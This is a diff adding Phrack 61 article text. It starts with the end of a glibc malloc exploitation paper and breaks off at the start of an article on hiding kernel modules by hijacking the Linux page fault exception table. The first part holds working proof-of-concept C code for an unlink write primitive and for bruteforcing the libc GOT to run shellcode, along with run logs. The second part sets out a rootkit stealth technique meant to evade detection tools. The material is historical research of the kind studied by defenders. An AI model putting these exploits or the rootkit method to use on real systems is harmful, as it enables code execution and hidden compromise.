+#define NON_MAIN_ARENA  4
+
+unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long 
+                               where,unsigned long sz){
+   unsigned long *unlinkMe;
+   int i=0;
+
+   if(sz<13) sz = 13;
+   unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long));
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = what;
+   unlinkMe[i++] = where-8;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = what;
+   unlinkMe[i++] = where-8;
+   for(;i<sz;i++)
+      if(i%2)
+         unlinkMe[i] = ((-(i-8) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE;
+      else
+         unlinkMe[i] = ((-(i-3) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE;
+
+   free(unlinkMe+SOMEOFFSET(sz));
+   return unlinkMe;
+}
+
+/* just force some libc function calls between each bruteforcing iteration */
+void do_little(void){
+   int w,r;
+   char buf[256];
+   sleep(0);
+   w = open("/dev/null",O_WRONLY);
+   r = open("/dev/urandom",O_RDONLY);
+   read(r,buf,sizeof(buf));
+   write(w,buf,sizeof(buf));
+   close(r);
+   close(w);
+   return;
+}
+
+int main(int argc, char **argv){
+   unsigned long *output,*bin=0;
+   unsigned long i=0,sz;
+   char *sc,*p;
+   unsigned long *start=0;
+
+   printf("\n## HINTED LIBC GOT BRUTEFORCING PoC ##\n\n");
+
+   sc = (char*) malloc(SC_SZ * LOOP_SZ);
+   printf("(-) %d bytes shellcode @ %p\n",SC_SZ,sc);
+   p = sc;
+   for(p=sc;p+LOOP_SZ<sc+SC_SZ;p+=LOOP_SZ)
+      memcpy(p,LOOP_SC,LOOP_SZ);
+
+
+   printf("(-) forcing bin address disclosure... ");
+   output = aa4bmoPrimitive(0xbfffffc0,0xbfffffc4,OUTPUT_SZ);
+   for(i=0;i<OUTPUT_SZ-1;i++)
+      if(output[i] == output[i+1] &&
+            ((output[i] & 0xffff0000) != 0xffff0000) ) {
+         bin = (unsigned long*)output[i];
+         printf("%p\n",bin);
+         start = bin - ADJUST;
+      }
+   if(!bin){
+      printf("failed\n");
+      return 0;
+   }
+
+   if(argv[1]) i = strtoll(argv[1], (char **)NULL,0);
+   else        i = 0;
+
+   printf("(-) starting libc GOT bruteforcing @ %p\n",start);
+   for(;;i++){
+      sz = SOMECHUNKSZ;
+      printf("  try #%.2d  writing %p at %p using %6d bytes chunk\n",
+             i,sc,start-(i*STEP),s*sizeof(unsigned long));
+      aa4bmoPrimitive((unsigned long)sc,(unsigned long)(start-(i*STEP)),sz);
+      do_little();
+   }
+
+   printf("I'm not here, this is not happening\n");
+}
+
+Let's see what happens:
+
+$ ./got_bf
+
+## HINTED LIBC GOT BRUTEFORCING PoC ##
+
+(-) 512 bytes shellcode @ 0x8049cb0
+(-) forcing bin address disclosure... 0x4212b1dc
+(-) starting libc GOT bruteforcing @ 0x4212a9dc
+  try #00  writing 0x8049cb0 at 0x4212a9dc using   1944 bytes chunk
+  try #01  writing 0x8049cb0 at 0x4212a9d4 using    588 bytes chunk
+  try #02  writing 0x8049cb0 at 0x4212a9cc using   1148 bytes chunk
+  try #03  writing 0x8049cb0 at 0x4212a9c4 using   1072 bytes chunk
+  try #04  writing 0x8049cb0 at 0x4212a9bc using    948 bytes chunk
+  try #05  writing 0x8049cb0 at 0x4212a9b4 using   1836 bytes chunk
+  ...
+  try #140  writing 0x8049cb0 at 0x4212a57c using   1416 bytes chunk
+  try #141  writing 0x8049cb0 at 0x4212a574 using    152 bytes chunk
+  try #142  writing 0x8049cb0 at 0x4212a56c using    332 bytes chunk
+Segmentation fault
+
+We obtained 142 consecutive tries without crashing using random sized
+chunks. We run our code again, starting from try number 143 this time,
+note the program gets the base bruteforcing address again.
+
+$ ./got_bf 143
+
+## HINTED LIBC GOT BRUTEFORCING PoC ##
+
+(-) 512 bytes shellcode @ 0x8049cb0
+(-) forcing bin address disclosure... 0x4212b1dc
+(-) starting libc GOT bruteforcing @ 0x4212a9dc
+  try #143  writing 0x8049cb0 at 0x4212a564 using   1944 bytes chunk
+  try #144  writing 0x8049cb0 at 0x4212a55c using    588 bytes chunk
+  try #145  writing 0x8049cb0 at 0x4212a554 using   1148 bytes chunk
+  try #146  writing 0x8049cb0 at 0x4212a54c using   1072 bytes chunk
+  try #147  writing 0x8049cb0 at 0x4212a544 using    948 bytes chunk
+  try #148  writing 0x8049cb0 at 0x4212a53c using   1836 bytes chunk
+  try #149  writing 0x8049cb0 at 0x4212a534 using   1132 bytes chunk
+  try #150  writing 0x8049cb0 at 0x4212a52c using   1432 bytes chunk
+  try #151  writing 0x8049cb0 at 0x4212a524 using    904 bytes chunk
+  try #152  writing 0x8049cb0 at 0x4212a51c using   2144 bytes chunk
+  try #153  writing 0x8049cb0 at 0x4212a514 using   2080 bytes chunk
+Segmentation fault
+
+It crashed much faster... probably we corrupted some libc data, or we have
+reached the GOT...
+
+$ ./got_bf 154
+
+## HINTED LIBC GOT BRUTEFORCING PoC ##
+
+(-) 512 bytes shellcode @ 0x8049cb0
+(-) forcing bin address disclosure... 0x4212b1dc
+(-) starting libc GOT bruteforcing @ 0x4212a9dc
+  try #154  writing 0x8049cb0 at 0x4212a50c using   1944 bytes chunk
+Segmentation fault
+
+$ ./got_bf 155
+
+## HINTED LIBC GOT BRUTEFORCING PoC ##
+
+(-) 512 bytes shellcode @ 0x8049cb0
+(-) forcing bin address disclosure... 0x4212b1dc
+(-) starting libc GOT bruteforcing @ 0x4212a9dc
+  try #155  writing 0x8049cb0 at 0x4212a504 using   1944 bytes chunk
+  try #156  writing 0x8049cb0 at 0x4212a4fc using    588 bytes chunk
+  try #157  writing 0x8049cb0 at 0x4212a4f4 using   1148 bytes chunk
+Segmentation fault
+
+$ ./got_bf 158
+
+## HINTED LIBC GOT BRUTEFORCING PoC ##
+
+(-) 512 bytes shellcode @ 0x8049cb0
+(-) forcing bin address disclosure... 0x4212b1dc
+(-) starting libc GOT bruteforcing @ 0x4212a9dc
+  try #158  writing 0x8049cb0 at 0x4212a4ec using   1944 bytes chunk
+  ...
+  try #179  writing 0x8049cb0 at 0x4212a444 using   1244 bytes chunk
+Segmentation fault
+
+$ ./got_bf 180
+
+## HINTED LIBC GOT BRUTEFORCING PoC ##
+
+(-) 512 bytes shellcode @ 0x8049cb0
+(-) forcing bin address disclosure... 0x4212b1dc
+(-) starting libc GOT bruteforcing @ 0x4212a9dc
+  try #180  writing 0x8049cb0 at 0x4212a43c using   1944 bytes chunk
+  try #181  writing 0x8049cb0 at 0x4212a434 using    588 bytes chunk
+  try #182  writing 0x8049cb0 at 0x4212a42c using   1148 bytes chunk
+  try #183  writing 0x8049cb0 at 0x4212a424 using   1072 bytes chunk
+Segmentation fault
+
+$ ./got_bf 183
+
+## HINTED LIBC GOT BRUTEFORCING PoC ##
+
+(-) 512 bytes shellcode @ 0x8049cb0
+(-) forcing bin address disclosure... 0x4212b1dc
+(-) starting libc GOT bruteforcing @ 0x4212a9dc
+  try #183  writing 0x8049cb0 at 0x4212a424 using   1944 bytes chunk
+  try #184  writing 0x8049cb0 at 0x4212a41c using    588 bytes chunk
+  try #185  writing 0x8049cb0 at 0x4212a414 using   1148 bytes chunk
+  try #186  writing 0x8049cb0 at 0x4212a40c using   1072 bytes chunk
+  try #187  writing 0x8049cb0 at 0x4212a404 using    948 bytes chunk
+  try #188  writing 0x8049cb0 at 0x4212a3fc using   1836 bytes chunk
+  try #189  writing 0x8049cb0 at 0x4212a3f4 using   1132 bytes chunk
+  try #190  writing 0x8049cb0 at 0x4212a3ec using   1432 bytes chunk
+
+Finally, the loop shellcode gets executed... 5 crashes were needed,
+stepping 8 bytes each time. Playing with the STEP and the ADJUST values
+and the do_little() function will yield different results.
+
+--] 4.5.4 Libc fingerprinting
+
+Having a bin address allows us to recognize the libc version being
+attacked.
+We just need to build a database with different libcs from different
+distributions to match the obtained bin address and bin number. 
+Knowing exactly which is the libc the target process has loaded gives us
+the exact absolute address of any location within libc, such as:
+function pointers, internal structures, flags, etc. This information can
+be abused to build several attacks in different scenarios, i.e. knowing
+the location of functions and strings allows to easily craft return into
+libc attacks [14].
+
+Besides, knowing the libc version enables us to know which Linux
+distribution is running the target host. These could allow further
+exploitation in case we are not able to exploit the bug (the one we are
+using to leak the bin address) to execute code.
+
+--] 4.5.5 Arena corruption (top, last remainder and bin modification)
+
+From the previously gathered main_arena address, we know the location of
+any bin, including the top chunk and the last reminder chunk.
+Corrupting any of this pointers will completely modify the allocator
+behavior. Right now, I don't have any code to confirm this, but there are
+lot of possibilities open for research here, as an attacker might be
+able to redirect a whole bin into his own supplied input.
+
+---------------------------------------------------------------------------
+--] 4.6 Copying the shellcode 'by hand'
+
+Other trick that allows the attacker to know the exact location of the
+injected shellcode, is copying the shellcode to a fixed address using the
+aa4bmo primitive.
+As we can't write any value, using unaligned writes is needed to create
+the shellcode in memory, writting 1 or 2 bytes each time.
+We need to be able to copy the whole shellcode before the server crashes
+in order to use this technique. 
+
+---------------------------------------------------------------------------
+--] 5 Conclusions
+
+malloc based vulnerabilities provide a huge opportunity for fully
+automated exploitation. 
+The ability to transform the aa4bmo primitive into memory leak primitives
+allows the attacker to exploit processes without any prior knowledge, even
+in presence of memory layout randomization schemes.
+
+    [ Note by editors: It came to our attention that the described
+      technique might not work for the glibc 2.3 serie. ]
+
+---------------------------------------------------------------------------
+--] 6 Thanks
+
+I'd like to thank a lot of people: 8a, beto, gera, zb0, raddy, juliano,
+kato, javier burroni, fgsch, chipi, MaXX, lck, tomas, lau, nahual, daemon,
+module, ...
+Classifying you takes some time (some 'complex' ppl), so I'll just say
+thank you for encouraging me to write this article, sharing your ideas,
+letting me learn a lot from you every day, reviewing the article,
+implementing the morecore idea for first time, being my friends, asking
+for torta, not making torta, personal support, coding nights, drinking
+beer, ysm, roquefort pizza, teletubbie talking, making work very 
+interesting, making the world a happy place to live, making people hate
+you because of the music...
+(you should know which applies for you, do not ask)
+
+---------------------------------------------------------------------------
+--] 7 References
+
+[1]  http://www.malloc.de/malloc/ptmalloc2.tar.gz
+     ftp://g.oswego.edu/pub/misc/malloc.c
+[2]  www.phrack.org/phrack/57/p57-0x08
+     Vudo - An object superstitiously believed to embody magical power
+     Michel "MaXX" Kaempf
+[3]  www.phrack.org/phrack/57/p57-0x09
+     Once upon a free()
+     anonymous
+[4]  http://www.phrack.org/show.php?p=59&a=7
+     Advances in format string exploitation
+     gera and riq
+[5]  http://www.coresecurity.com/common/showdoc.php? \
+     idx=359&idxseccion=13&idxmenu=32
+     About exploits writing
+     gera
+[6]  http://online.securityfocus.com/bid/5363
+[7]  http://security.e-matters.de/advisories/012003.txt
+[8]  http://www.openwall.com/advisories/OW-002-netscape-jpeg.txt
+     JPEG COM Marker Processing Vulnerability in Netscape Browsers
+     Solar Designer
+[9]  http://lists.insecure.org/lists/bugtraq/2000/Nov/0086.html
+     Local root exploit in LBNL traceroute
+     Michel "MaXX" Kaempf
+[10] http://www.w00w00.org/files/articles/heaptut.txt 
+     w00w00 on Heap Overflows
+     Matt Conover & w00w00 Security Team
+[11] http://www.phrack.org/show.php?p=49&a=14
+     Smashing The Stack For Fun And Profit
+     Aleph One
+[12] http://phrack.org/show.php?p=55&a=8
+     The Frame Pointer Overwrite
+     klog
+[13] http://www.phrack.org/show.php?p=59&a=9
+     Bypassing PaX ASLR protection
+     p59_09@author.phrack.org
+[14] http://phrack.org/show.php?p=58&a=4
+     The advanced return-into-lib(c) exploits
+     Nergal
+    
+
+
+---------------------------------------------------------------------------
+Appendix I - malloc internal structures overview
+
+This appendix contains a brief overview about some details of malloc
+inner workings we need to have in mind in order to fully understand most
+of the techniques explained in this paper.
+
+Free consolidated 'chunks' of memory are maintained mainly
+(forgetting the top chunk and the last_remainder chunk) in
+circular double-linked lists, which are initially empty and evolve
+with the heap layout. The circularity of these lists is very important
+for us, as we'll see later on.
+
+A 'bin' is a pair of pointers from where these lists hang.  There
+exist 128 (#define NAV 128) bins, which may be 'small' bins or 'big
+bins'. Small bins contain equally sized chunks, while big bins are
+composed of not the same size chunks, ordered by decreasing size.
+
+These are the macros used to index into bins depending of its size:
+
+#define MAX_SMALLBIN         63
+#define MAX_SMALLBIN_SIZE   512
+#define SMALLBIN_WIDTH        8
+#define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH)
+#define smallbin_index(sz)  (((unsigned long)(sz)) >> 3)
+#define bin_index(sz)                                                         \
+(((((unsigned long)(sz)) >> 9) ==    0) ?       (((unsigned long)(sz)) >>  3):\
+ ((((unsigned long)(sz)) >> 9) <=    4) ?  56 + (((unsigned long)(sz)) >>  6):\
+ ((((unsigned long)(sz)) >> 9) <=   20) ?  91 + (((unsigned long)(sz)) >>  9):\
+ ((((unsigned long)(sz)) >> 9) <=   84) ? 110 + (((unsigned long)(sz)) >> 12):\
+ ((((unsigned long)(sz)) >> 9) <=  340) ? 119 + (((unsigned long)(sz)) >> 15):\
+ ((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\
+                                          126)
+
+From source documentation we know that 'an arena is a configuration
+of malloc_chunks together with an array of bins. One or more 'heaps'
+are associated with each arena, except for the 'main_arena', which is
+associated only with the 'main heap', i.e. the conventional free
+store obtained with calls to MORECORE()...', which is the one we are
+interested in.
+
+This is the way an arena looks like...
+
+typedef struct _arena {
+  mbinptr av[2*NAV + 2];
+  struct _arena *next;
+  size_t size;
+#if THREAD_STATS
+  long stat_lock_direct, stat_lock_loop, stat_lock_wait;
+#endif
+
+'av' is the array where bins are kept.
+
+These are the macros used along the source code to access the bins,
+we can see the first two bins are never indexed; they refer to the
+topmost chunk, the last_remainder chunk and a bitvector used to
+improve seek time, though this is not really important for us.
+
+    /* bitvector of nonempty blocks */
+#define binblocks(a)      (bin_at(a,0)->size)
+    /* The topmost chunk */
+#define top(a)            (bin_at(a,0)->fd)  
+    /* remainder from last split */
+#define last_remainder(a) (bin_at(a,1))      
+
+#define bin_at(a, i)   BOUNDED_1(_bin_at(a, i))
+#define _bin_at(a, i)  ((mbinptr)((char*)&(((a)->av)[2*(i)+2]) - 2*SIZE_SZ))
+
+
+Finally, the main_arena...
+
+#define IAV(i) _bin_at(&main_arena, i), _bin_at(&main_arena, i)
+static arena main_arena = {
+    {
+ 0, 0,
+ IAV(0),   IAV(1),   IAV(2),   IAV(3),   IAV(4),   IAV(5),   IAV(6),   IAV(7),
+ IAV(8),   IAV(9),   IAV(10),  IAV(11),  IAV(12),  IAV(13),  IAV(14),  IAV(15),
+ IAV(16),  IAV(17),  IAV(18),  IAV(19),  IAV(20),  IAV(21),  IAV(22),  IAV(23),
+ IAV(24),  IAV(25),  IAV(26),  IAV(27),  IAV(28),  IAV(29),  IAV(30),  IAV(31),
+ IAV(32),  IAV(33),  IAV(34),  IAV(35),  IAV(36),  IAV(37),  IAV(38),  IAV(39),
+ IAV(40),  IAV(41),  IAV(42),  IAV(43),  IAV(44),  IAV(45),  IAV(46),  IAV(47),
+ IAV(48),  IAV(49),  IAV(50),  IAV(51),  IAV(52),  IAV(53),  IAV(54),  IAV(55),
+ IAV(56),  IAV(57),  IAV(58),  IAV(59),  IAV(60),  IAV(61),  IAV(62),  IAV(63),
+ IAV(64),  IAV(65),  IAV(66),  IAV(67),  IAV(68),  IAV(69),  IAV(70),  IAV(71),
+ IAV(72),  IAV(73),  IAV(74),  IAV(75),  IAV(76),  IAV(77),  IAV(78),  IAV(79),
+ IAV(80),  IAV(81),  IAV(82),  IAV(83),  IAV(84),  IAV(85),  IAV(86),  IAV(87),
+ IAV(88),  IAV(89),  IAV(90),  IAV(91),  IAV(92),  IAV(93),  IAV(94),  IAV(95),
+ IAV(96),  IAV(97),  IAV(98),  IAV(99),  IAV(100), IAV(101), IAV(102), IAV(103),
+ IAV(104), IAV(105), IAV(106), IAV(107), IAV(108), IAV(109), IAV(110), IAV(111),
+ IAV(112), IAV(113), IAV(114), IAV(115), IAV(116), IAV(117), IAV(118), IAV(119),
+ IAV(120), IAV(121), IAV(122), IAV(123), IAV(124), IAV(125), IAV(126), IAV(127)
+    },
+    &main_arena, /* next */
+    0, /* size */
+#if THREAD_STATS
+    0, 0, 0, /* stat_lock_direct, stat_lock_loop, stat_lock_wait */
+#endif
+    MUTEX_INITIALIZER /* mutex */
+};
+
+The main_arena is the place where the allocator stores the 'bins' to which
+the free chunks are linked depending on they size. 
+
+The little graph below resumes all the structures detailed before:
+
+<main_arena> @ libc's DATA
+
+   [bin_n]         (first chunk)
+      ptr]  ---->  [<- chunk ->] [<- chunk ->] [<-  fd
+                                               [    chunk
+      ptr]  ---->  [<- chunk ->] [<- chunk ->] [<-  bk
+ [bin_n+1]         (last chunk)
+
+     .
+     .
+     .
+
+   [bin_X]
+      ptr] ---->  [<-  fd
+                  [    lonely but interesting chunk
+      ptr] ---->  [<-  bk
+     .
+     .
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/7.txt b/phrack61/7.txt
new file mode 100644
index 0000000..78b837b
--- /dev/null
+++ b/phrack61/7.txt
@@ -0,0 +1,866 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x07 of 0x0f
+
+|=-------------=[ Hijacking Linux Page Fault Handler ]=------------------=|
+|=-------------=[            Exception Table         ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ buffer <buffer@antifork.org> ]=---------------------=|
+|=------------------[ http://buffer.antifork.org ]=----------------------=|
+
+
+
+--[ Contents
+
+    
+    1.  Introduction
+    2.  System Calls and User Space Access
+    3.  Page Fault Exception
+    4.  Implementation
+    5.  Further Considerations
+    6.  Conclusions
+    7.  Thanks
+    8.  References
+
+
+
+--[ 1 - Introduction
+
+
+"Just another Linux LKM"... that's what you could think reading this
+article, but I think it's not correct. In the past years, we have seen a
+lot of techniques for hiding many kinds of things, e.g. processes, network
+connection, files, etc. etc., through the use of LKM's. The first
+techniques were really simple to understand. The real problem with these
+techniques is that they are easy to detect as well. If you replace an
+address in the syscall table, or if you overwrite the first 7 bytes within
+syscall code (as described by Silvio Cesare [4]), it's quite easy for
+tools such as Kstat [5] and/or AngeL [6] to identify these malicious
+activities. Later, more sophisticated techniques were presented. An
+interesting technique was proposed by kad, who suggested modifying the
+Interrupt Descriptor Table in such a way so as to redirect an exception
+raised from User Space code (such as the "Divide Error") to execute a new
+handler whose address replaced the original one in the IDT entry [7]. This
+idea is pretty but it has two disadvantages:
+
+1- it's detectable using an approach based on hash values computed on the
+whole IDT, as shown by AngeL in its latest 0.9.x releases. This is mainly
+due to the fact that the address at which the IDT lives in kernel memory
+can be easily obtained since its value is stored in %idtr register. This
+register can be read with the asm instruction sidt which allows to store
+it in a variable.
+
+2- if a user code executes a division by 0 (it may happen... ) a strange
+behaviour could appear. Yes, someone could think that this is uncommon if
+we choose the right handler, but what if there is a safer solution?
+
+The idea I'm proposing has just one goal: to provide effective stealth
+against all tools used for identifying malicious LKM's. The technique is
+based on a kernel feature which is never used in practice. In fact, as we
+are going to see, we will be exploiting a general protection mechanism in
+the memory management subsystem. This mechanism is used only if a user
+space code is deeply bugged and this is not usually the case.
+
+No more words let's start!
+
+
+
+--[ 2 - System Calls and User Space Access
+
+
+First of all, a bit of theory. I'll refer to Linux kernel 2.4.20, however
+the code is almost the same for kernels 2.2. In particular we are
+interested in what happens in some situations when we need to ask a kernel
+feature through a syscall. When a syscall is called from User Space
+(through software interrupt 0x80) the system_call() exception handler is
+executed. Let's take a look to its implementation, found in 
+arch/i386/kernel/entry.S.
+
+
+ENTRY(system_call)
+        pushl %eax                      # save orig_eax
+        SAVE_ALL
+        GET_CURRENT(%ebx)
+        testb $0x02,tsk_ptrace(%ebx)    # PT_TRACESYS
+        jne tracesys
+        cmpl $(NR_syscalls),%eax
+        jae badsys
+        call *SYMBOL_NAME(sys_call_table)(,%eax,4)
+        movl %eax,EAX(%esp)             # save the return value
+[..]
+
+
+As we can easily see, system_call() saves all registers' contents in the
+Kernel Mode stack. It then derives a pointer to the task_struct structure
+of the currently executing process by calling GET_CURRENT(%ebx). Some
+checks are done to verify the correctness of syscall number and to see if
+the process is currently being traced. Finally the syscall is called by
+using sys_call_table, which maintains the addresses of the syscalls, by
+using the syscall number saved in %eax as an offset within the table. Now
+let's take a look at some particular syscalls. For our purposes, we are
+searching for syscalls which take a User Space pointer as an argument. I
+chose sys_ioctl() but there are other ones with a similar behaviour.
+
+
+asmlinkage long sys_ioctl(unsigned int fd, unsigned int cmd, unsigned long
+arg)
+{
+        struct file * filp;
+        unsigned int flag;
+        int on, error = -EBADF;
+[..]
+
+	 case FIONBIO:
+               if ((error = get_user(on, (int *)arg)) != 0)
+                       break;
+               flag = O_NONBLOCK;
+[..]
+
+
+The macro get_user() is used to copy data from User Space to Kernel Space.
+In this case, we are directing our attention at the code for setting non
+blocking I/O on the file descriptor passed to the syscall. An example of
+correct use, from User Space, of this feature could be :
+
+
+	int	on = 1;
+
+	ioctl(fd, FIONBIO, &on); 
+
+
+Let's take a look at the get_user() implementation which can be found in
+include/asm/uaccess.h.
+
+
+#define __get_user_x(size,ret,x,ptr) \
+        __asm__ __volatile__("call __get_user_" #size \
+                :"=a" (ret),"=d" (x) \
+                :"0" (ptr))
+        
+/* Careful: we have to cast the result to the type of the pointer for sign
+reasons */
+#define get_user(x,ptr)                                                 \
+({      int __ret_gu,__val_gu;                                          \
+        switch(sizeof (*(ptr))) {                                       \
+        case 1:  __get_user_x(1,__ret_gu,__val_gu,ptr); break;          \
+        case 2:  __get_user_x(2,__ret_gu,__val_gu,ptr); break;          \
+        case 4:  __get_user_x(4,__ret_gu,__val_gu,ptr); break;          \
+        default: __get_user_x(X,__ret_gu,__val_gu,ptr); break;          \
+        }                                                               \
+        (x) = (__typeof__(*(ptr)))__val_gu;                             \
+        __ret_gu;                                                       \
+})
+
+
+As we can see, get_user() is implemented in a very smart way because it
+calls the right function basing on the size of the argument to be copied
+from User Space. Depending on the value of (sizeof (*(ptr))) __get_user_1()
+, __get_user_2() or __get_user_4(), would be called.
+
+Now let's take a look at one of these functions, __get_user_4(), which can
+be found in arch/i386/lib/getuser.S.
+
+
+
+addr_limit = 12
+
+[..]
+
+.align 4
+.globl __get_user_4
+__get_user_4:
+        addl $3,%eax
+        movl %esp,%edx
+        jc bad_get_user
+        andl $0xffffe000,%edx
+        cmpl addr_limit(%edx),%eax
+        jae bad_get_user
+3:      movl -3(%eax),%edx
+        xorl %eax,%eax
+        ret
+  
+bad_get_user:
+        xorl %edx,%edx
+        movl $-14,%eax
+        ret
+  
+.section __ex_table,"a"
+        .long 1b,bad_get_user
+        .long 2b,bad_get_user
+        .long 3b,bad_get_user
+.previous
+
+
+The last lines between .section and .previous identify the exception table
+which we'll discuss later since it's important for our purposes. 
+
+As it can be seen, the __get_user_4() implementation is straightforward.
+The argument address is in the %eax register. By adding 3 to %eax, it's
+possible to obtain the greatest User Space referenced address. It's
+necessary to control if this address is in the User Mode addressable range
+(from 0x00000000 to PAGE_OFFSET - 1, where PAGE_OFFSET is usually
+0xc0000000). 
+
+If, when comparing the User Space address with current->addr_limit.seg
+(stored at offset 12 from the beginning of the task descriptor, whose
+pointer was obtained by zeroing the last 13 bits of the Kernel Mode stack
+pointer) we find it is greater than PAGE_OFFSET - 1, we jump to the label
+bad_get_user thus zeroing %edx and putting -EFAULT (-14) in %eax (syscall
+return value).
+
+But what happens if this address is in the User Mode addressable range
+(below PAGE_OFFSET) but outside the process address space? Did someone say
+Page Fault?!
+
+
+
+--[ 3 - Page Fault Exception
+
+
+"A page fault exception is raised when the addressed page is not present in
+memory, the corresponding page table entry is null or a violation of the
+paging protection mechanism has occurred." [1]
+
+Linux handles a page fault exception with the page fault handler
+do_page_fault(). This handler can be found in arch/i386/mm/fault.c
+
+In particular, we are interested in the three cases which may occur when a
+page fault exception occurs in Kernel Mode.
+
+In the first case, "the kernel attempts to address a page belonging to the
+process address space, but either the corresponding page frame does not
+exist (Demand Paging) or the kernel is trying to write a read-only page
+(Copy On Write)." [1]
+
+In the second case, "some kernel function includes a programming bug that
+causes the exception to be raised when the program is executed;
+alternatively, the exception might be caused by a transient hardware
+error." [1]
+
+This two cases are not interesting for our purposes.
+
+The third (and interesting) case is when "a system call service routine
+(such as sys_ioctl() in our example) attempts to read or write into a
+memory area whose address has been passed as a system call parameter, but
+that address does not belong to the process address space." [1]
+
+The first case is easily identified by looking at the process memory
+regions. If the address which caused the exception belongs to the process
+address space it will fall within a process memory region. This is not
+interesting for our purposes.
+
+The interesting thing is how the kernel can distinguish between the second
+and the third case. The key to determining the source of a page fault lies
+in the narrow range of calls that the kernel uses to access the process
+address space.
+
+For this purpose, the kernel builds an exception table in kernel memory.
+The boundaries of such region are defined by the symbols
+__start___ex_table and __stop___ex_table. Their values can be easily
+derived from System.map in this way.
+
+
+buffer@rigel:/usr/src/linux$ grep ex_table System.map 
+c0261e20 A __start___ex_table
+c0264548 A __stop___ex_table
+buffer@rigel:/usr/src/linux$
+
+
+What's the content of this memory region? In this region you could find
+couples of address. The first one (insn) represents the address of the
+instruction (belonging to a function which accesses the User Space address
+range, such as the ones previously described) which may raise a page
+fault. The second one (fixup) is a pointer to the "fixup code".
+
+When a page fault occurs within the kernel and the first case (demand
+paging or copy on write) is not verified, the kernel checks if the address
+which caused the page fault matches an insn entry in the exception table.
+If it doesn't, we are in the second case and the kernel raises an Oops.
+Otherwise, if the address matches an insn entry in the exception table, we
+are in the third case since the page fault exception was raised while
+accessing a User Space address. In this case, the control is passed to the
+function whose address is specified in the exception table as fixup code.
+
+This is done by simply doing this.
+
+
+if ((fixup = search_exception_table(regs->eip)) != 0) {
+                regs->eip = fixup;
+                return;
+        }
+
+
+The function search_exception_table() searches for an insn entry in the
+exception table which matches the address of the instruction which raised
+the page fault. If it's found, it means the page fault exception was
+raised during an access to a User Space address. In this case, regs->eip
+is pointed to the fixup code and then do_page_fault() returns thus jumping
+to the fixup code.
+
+It is obvious to realize that the three functions __get_user_x(), which
+access User Space addresses, must have a fixup code for handling
+situations like the one depicted before.
+
+Going back let's take a look again at __get_user_4()
+
+
+.align 4
+.globl __get_user_4
+__get_user_4:
+        addl $3,%eax
+        movl %esp,%edx
+        jc bad_get_user
+        andl $0xffffe000,%edx
+        cmpl addr_limit(%edx),%eax
+        jae bad_get_user
+3:      movl -3(%eax),%edx
+        xorl %eax,%eax
+        ret
+
+bad_get_user:
+        xorl %edx,%edx
+        movl $-14,%eax
+        ret
+
+.section __ex_table,"a"
+        .long 1b,bad_get_user
+        .long 2b,bad_get_user
+        .long 3b,bad_get_user
+.previous
+
+
+First of all, looking at the code, we should point our attention to the GNU
+Assembler .section directive which allows the programmer to specify which
+section of the executable file will contain the code that follows. The "a"
+attribute specifies that the section must be loaded in memory together
+with the rest of the kernel image. So, in this case, the three entries are
+inserted in the kernel exception table and are loaded with the rest of the
+kernel image.
+
+Now, taking a look at __get_user_4() there's an instruction labeled with a
+3.
+
+
+3:      movl -3(%eax),%edx
+
+
+If we added 3 to %eax (it is done in the first instruction of the function
+__get_user_4() for checking purposes as outlined before), -3(%eax) is the
+starting address of the 4-byte argument to copy from User Space. So, this
+is the instruction which really accesses User Space address. Take a look
+at the last entry in the exception table
+
+
+	.long 3b,bad_get_user
+
+
+If you know that the suffix b stands for 'backward' to indicate that the
+label appears in a previous line of code (and so simply ignore it just for
+understanding the meaning of this code), you could realize that here we
+have
+
+
+	insn  :	 address of   movl -3(%eax),%edx
+ 	fixup :  address of   bad_get_user
+
+
+Well guys what we are realizing here is that bad_get_user is the fixup code
+for the function __get_user_4() and it will be called every time the
+instruction labeled 3 raises a page fault. This is obviously still true for
+__get_user_1() and __get_user_2().
+
+At this point we need bad_get_user address.
+
+
+buffer@rigel:/usr/src/linux$ grep bad_get_user System.map
+c022f39c t bad_get_user
+buffer@rigel:/usr/src/linux$
+
+
+If you compile exception.c (shown later) with flag FIXUP_DEBUG set, you'll
+see this in your log files which clearly shows what I said before.
+
+
+May 23 18:36:35 rigel kernel:  address : c0264530 insn: c022f361 
+			       fixup : c022f39c 
+May 23 18:36:35 rigel kernel:  address : c0264538 insn: c022f37a 
+			       fixup : c022f39c 
+May 23 18:36:35 rigel kernel:  address : c0264540 insn: c022f396 
+			       fixup : c022f39c
+
+
+buffer@rigel:/usr/src/linux$  grep __get_user_ System.map  
+c022f354 T __get_user_1 
+c022f368 T __get_user_2 
+c022f384 T __get_user_4
+
+
+Looking at the first entry in the exception table, we can easily realize
+that 0xc022f39c is the address of the instruction labeled 3 in the source
+code within __get_user_4() which may raise the page fault as outlined
+before. Obviously, the situation is similar for the other two functions.
+
+Now the idea should be clear. If I replace a fixup code address in the
+exception table and then from User Space I just call a syscall with a bad
+address argument I can force the execution of whatever I want. And for
+doing this I need to modify just 4 bytes! Moreover, this appears to be
+particulary stealth since this situation is not so common. In fact, for
+raising this behaviour, it's necessary that the program you will execute
+contain a bug in passing an argument to a syscall. If you know this can
+lead to something interesting you could even do it but this situation is
+very uncommon. In the next section I present a proof of concept which
+shows how to exploit what I discussed. In this example, I modified fixup
+code addresses of the three __get_user_x() functions.
+
+
+
+--[ 4 - Implementation
+
+
+This is the LKM code. In this code, I hardcoded some values taken from my
+System.map file but it's not needed to edit the source file since these
+values can be passed to the module when calling insmod for linking it to
+the kernel. If you want more verbosity in the log files, compile it with
+the flag -DFIXUP_DEBUG (as done for showing results presented before).
+
+
+
+---------------[ exception.c ]----------------------------------------
+
+/*
+ * Filename: exception.c
+ * Creation date: 23.05.2003
